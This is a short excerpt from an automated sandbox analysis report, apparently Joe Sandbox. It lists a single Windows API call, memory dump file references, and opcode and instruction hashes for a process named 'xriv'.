                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 01382093
                              Strings
                              Memory Dump Source
                              • Source File: 00000008.00000002.446805232.0000000001371000.00000020.00000001.01000000.00000009.sdmp, Offset: 01370000, based on PE: true
                              • Associated: 00000008.00000002.446790406.0000000001370000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446840556.000000000139E000.00000002.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446853837.00000000013A8000.00000004.00000001.01000000.00000009.sdmpDownload File
                              • Associated: 00000008.00000002.446872459.00000000013AD000.00000002.00000001.01000000.00000009.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_8_2_1370000_xriv.jbxd
                              Yara matches
                              Similarity
                              • API ID: FileModuleName
                              • String ID: 5120$H
                              • API String ID: 514040917-2391956277
                              • Opcode ID: f516977dd000e3e8f81db5a6eb48f85ea8e07bf283662e300c23ef7c5b439c36
                              • Instruction ID: 18a7beb11d93ff5bfa40f584897a648b153d8eced247e03397ef31f185fd4b21
                              • Opcode Fuzzy Hash: f516977dd000e3e8f81db5a6eb48f85ea8e07bf283662e300c23ef7c5b439c36
                              • Instruction Fuzzy Hash: FE21BDB09003889BDB25FF28C9867DDBFB8AB02308F5401CCD54967282D7795B488BE3
                              Uniqueness

                              Uniqueness Score: -1.00%